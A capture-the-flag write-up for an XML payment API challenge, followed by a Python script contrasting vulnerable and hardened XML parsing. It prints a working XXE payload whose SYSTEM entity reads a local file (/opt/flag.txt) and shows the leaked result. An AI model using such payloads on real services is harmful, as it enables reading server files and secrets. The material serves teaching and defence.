Task

So we built this new payment interface, right? You know, the new, super secure one? Yeah, our new intern totally insists that he can hack it! I told him I’d double his paycheck this month if he succeeds, otherwise he’ll be fired. Pff, what an idiot.
Disclose the content of /opt/flag.txt!

The provided URL was the following:

https://ctf.mrmcd.net/agil/ 

They also provided two hints:

Hint 1

XML was the shit back in the day, let me tell ya!

Hint 2

I’m more of a JSON person tbh, XML is a bit too dynamic for my taste.

Solution

First I had to guess the correct URL, since the provided URL returns HTTP status code 404 (page not found).

Because it is a payment service, I simply tried the path /payment, which returned HTTP status code 405 (method not allowed) for a GET request. An OPTIONS request reveals that only OPTIONS and PUT requests are allowed. So I tried PUT with an empty XML, which returned HTTP status code 500 (internal server error) with the following content:

invalid payment xml

So I tried building the XML hoping that the server will tell me how to do it properly. The next try looked like this:

<?xml version="1.0" encoding="utf-8"?>
<payment>
</payment>

Which resulted in:

invalid amount

From here it was just easy trial and error, following the error messages, until I was able to send PUT requests with a valid XML:

<?xml version="1.0" encoding="utf-8"?>
<payment>
	<amount>1337</amount>
	<currency>EUR</currency>
	<sender>Dagobert</sender>
	<receiver>ebin</receiver>
	<narrativeText>very ebin transaction</narrativeText>
</payment>

Resulting in the following response:

payment created: 67916777-4998-11ee-bd93-0242ac13000d

Nice, now we have something to GET, so I sent a GET request for the path /payment/67916777-4998-11ee-bd93-0242ac13000d

The response contains the XML we originally sent. Now it’s time to send a malicious XML to obtain the secret: the hint about XML being too dynamic points at external entities (XXE), so I declared an entity that reads the flag file and referenced it in narrativeText:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///opt/flag.txt"> ]>
<payment>
	<amount>1337</amount>
	<currency>EUR</currency>
	<sender>Dagobert</sender>
	<receiver>ebin</receiver>
	<narrativeText>&xxe;</narrativeText>
</payment>

Response:

<?xml version=\"1.0\" ?>
<payment>
   <uuid>6eb99f2d-490e-11ee-bd93-0242ac13000d</uuid>
   <sender>Dagobert</sender>
   <receiver>ebin</receiver>
   <amount>1337</amount>
   <currency>EUR</currency>
   <narrativeText>MRMCD2023{70d4y_15_p4yd4y_wh00p_wh00p}</narrativeText>
</payment>

That was it, this is the flag:

MRMCD2023{70d4y_15_p4yd4y_wh00p_wh00p}

Solved by petrosyan
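As an added defender's illustration (not part of the original writeup or of the challenge's own code), the following Python script parses the same payment document shape with the standard library's xml.sax in both configurations: the misconfigured one, where external general entities are resolved and a SYSTEM entity pulls in a local file, and the hardened one, which refuses any DTD before parsing and leaves external entity resolution off. The secret file (a temp file with the constructed content EXAMPLE{constructed_secret}), the parse_payment and demo helper names and the error messages mirroring the service's replies are all assumptions of the example; the SYSTEM identifier is a plain file path rather than the file:// URL used above, so the parser opens it directly.

```python
import io
import os
import re
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges

REQUIRED_FIELDS = ("amount", "currency", "sender", "receiver", "narrativeText")

# A payment document has no legitimate reason to carry a DTD, so the hardened
# parser refuses any <!DOCTYPE or <!ENTITY before expat ever sees the bytes.
# This also covers internal-entity expansion ("billion laughs"), which turning
# off external entities alone does not.
_DTD_MARKER = re.compile(rb"<!(?:DOCTYPE|ENTITY)")


class _PaymentHandler(ContentHandler):
    """Collects the text content of every child element of <payment>."""

    def __init__(self):
        super().__init__()
        self.fields = {}
        self._buf = None

    def startElement(self, name, attrs):
        if name != "payment":
            self._buf = []

    def characters(self, content):
        if self._buf is not None:
            self._buf.append(content)

    def endElement(self, name):
        if self._buf is not None:
            self.fields[name] = "".join(self._buf).strip()
            self._buf = None


def parse_payment(data, *, reject_dtd=True, resolve_external_entities=False):
    """Parse one payment document (bytes) and return its fields as a dict.

    The defaults are the hardened configuration; the keyword arguments exist
    only so the vulnerable configuration can be shown next to it.
    """
    if reject_dtd and _DTD_MARKER.search(data):
        raise ValueError("invalid payment xml: DTD not allowed")
    handler = _PaymentHandler()
    parser = xml.sax.make_parser()
    parser.setContentHandler(handler)
    # False is already the default in xml.sax (since Python 3.7.1); enabling it
    # is exactly what lets a SYSTEM entity read local files into the document.
    parser.setFeature(feature_external_ges, resolve_external_entities)
    try:
        parser.parse(io.BytesIO(data))
    except xml.sax.SAXParseException:
        raise ValueError("invalid payment xml") from None
    # Error messages modelled on the service's replies seen in the writeup.
    for field in REQUIRED_FIELDS:
        if field not in handler.fields:
            raise ValueError("invalid " + field)
    if not handler.fields["amount"].isdigit():
        raise ValueError("invalid amount")
    return handler.fields


# Same shape as the payload in the writeup; {path} is filled with the temp file.
PAYLOAD_TEMPLATE = """<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "{path}"> ]>
<payment>
  <amount>1337</amount>
  <currency>EUR</currency>
  <sender>Dagobert</sender>
  <receiver>ebin</receiver>
  <narrativeText>&xxe;</narrativeText>
</payment>
"""


def demo():
    """Run the payload against a constructed secret file in three parser setups.

    Returns what each configuration hands back for narrativeText, or whether
    the document was refused outright.
    """
    # Constructed stand-in for the flag file; nothing outside it is read.
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write("EXAMPLE{constructed_secret}")
        secret_path = f.name
    try:
        payload = PAYLOAD_TEMPLATE.format(path=secret_path).encode()
        results = {}
        # 1. Misconfigured service: DTD accepted and external entities resolved,
        #    so the file content ends up in the stored payment.
        results["vulnerable"] = parse_payment(
            payload, reject_dtd=False, resolve_external_entities=True
        )["narrativeText"]
        # 2. DTD still accepted, but with xml.sax's default the external entity
        #    expands to nothing instead of to the file.
        results["entities_off"] = parse_payment(payload, reject_dtd=False)["narrativeText"]
        # 3. Hardened default: the document is refused before parsing starts.
        try:
            parse_payment(payload)
            results["dtd_rejected"] = False
        except ValueError:
            results["dtd_rejected"] = True
        return results
    finally:
        os.unlink(secret_path)


if __name__ == "__main__":
    print(demo())
```

The pre-parse DTD check is deliberately crude: a payment API never needs a DTD, so refusing the whole document on sight is cheaper and safer than trying to reason about which entity declarations are harmless, and it leaves a clear "invalid payment xml" trail in the logs whenever someone probes with one.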